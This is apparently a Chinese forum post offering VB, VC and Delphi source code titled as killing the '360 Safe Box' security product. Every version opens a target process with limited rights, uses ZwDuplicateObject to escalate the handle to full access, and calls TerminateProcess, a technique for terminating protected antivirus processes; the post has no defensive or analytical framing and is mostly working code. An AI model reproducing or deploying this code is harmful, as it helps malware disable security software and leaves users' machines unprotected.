干掉360保险箱VB/VC/delphi 源码

干掉360保险箱VB/VC/delphi 源码

VB 源码：
Option Explicit
Private Declare Function TerminateProcess Lib "kernel32" (ByVal hProcess As Long, ByVal uExitCode As Long) As Long
Private Declare Function ZwDuplicateObject _
               Lib "NTDLL.DLL" (ByVal SourceProcessHandle As Long, _
                           ByVal SourceHandle As Long, _
                           ByVal TargetProcessHandle As Long, _
                           ByRef TargetHandle As Long, _
                           ByVal DesiredAccess As Long, _
                           ByVal HandleAttributes As Long, _
                           ByVal Options As Long) As Long
Private Declare Function OpenProcess Lib "kernel32.dll" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessID As Long) As Long

Function FcOpenProcess&(p&)
Dim ProcessHandle As Long
Dim Rtn As Long
ProcessHandle = OpenProcess(&H400, 0, p)
If ProcessHandle <> 0 Then
      Rtn = ZwDuplicateObject(-1, ProcessHandle, -1, VarPtr(ProcessHandle), &H1F0FFF, 0, 1)
      FcOpenProcess = ProcessHandle
End If
End Function
Private Sub Command1_Click()
Dim ProcessHandle As Long
ProcessHandle = FcOpenProcess&(1884)
TerminateProcess ProcessHandle, 0
End Sub
/////////////////////// VC 源码
void KillProcess (ULONG dwProcessId)
{
   HMODULE hNTDLL = GetModuleHandle("ntdll.dll");
   HANDLE hProcessHandle;
     
   _ZwDuplicateObject ZwDuplicateObject =
         (_ZwDuplicateObject) GetProcAddress (hNTDLL, "ZwDuplicateObject");

   //打开进程权限要为0x400
   hProcessHandle = OpenProcess(0x400, FALSE, dwProcessId);
   if(hProcessHandle != NULL)
   {
         //复制句柄
         ZwDuplicateObject((HANDLE)-1,(PHANDLE)hProcessHandle,(HANDLE)-1,&hProcessHandle,0x1F0FFF,0, 1);
   }

   TerminateProcess(hProcessHandle, 0);
}
//////////////////////////////////////
既然VB VC 都有了 也就不差 delphi的了
/////////////////////
附上D源码
/////////////////////
function ZwDuplicateObject( SourceProcessHandle,SourceHandle ,TargetProcessHandle ,TargetHandle,DesiredAccess ,HandleAttributes,Options: LongInt):LongInt stdcall; external ’NTDLL.DLL’ name ’ZwDuplicateObject’;

Function FcOpenProcess(p:Longint):Longint;
var
Rtn,ProcessHandle:Longint;
begin
ProcessHandle := OpenProcess($400, False, p);
result:=0;
If ProcessHandle <> 0 Then
begin
      Rtn := ZwDuplicateObject(-1, ProcessHandle, -1, Integer(@ProcessHandle), $1F0FFF, 0, 1);
      result := ProcessHandle
End;
End;

procedure TForm1.Button1Click(Sender: TObject);
var
ProcessHandle :Longint;
begin
ProcessHandle := FcOpenProcess(3440);
TerminateProcess( ProcessHandle, 0 );
end;